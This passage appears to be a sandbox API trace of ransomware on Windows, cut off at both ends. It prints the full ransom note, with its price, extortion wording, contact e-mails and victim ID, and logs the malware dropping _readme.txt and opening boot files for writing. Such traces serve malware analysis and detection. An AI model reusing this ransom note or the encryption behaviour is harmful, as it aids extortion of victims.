more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0183.792] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0183.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0183.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.794] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*" (normalized: "c:\\boot\\hu-hu\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0183.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.794] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.794] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.796] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned=".mui" [0183.796] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.796] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.796] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0183.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.797] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.797] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 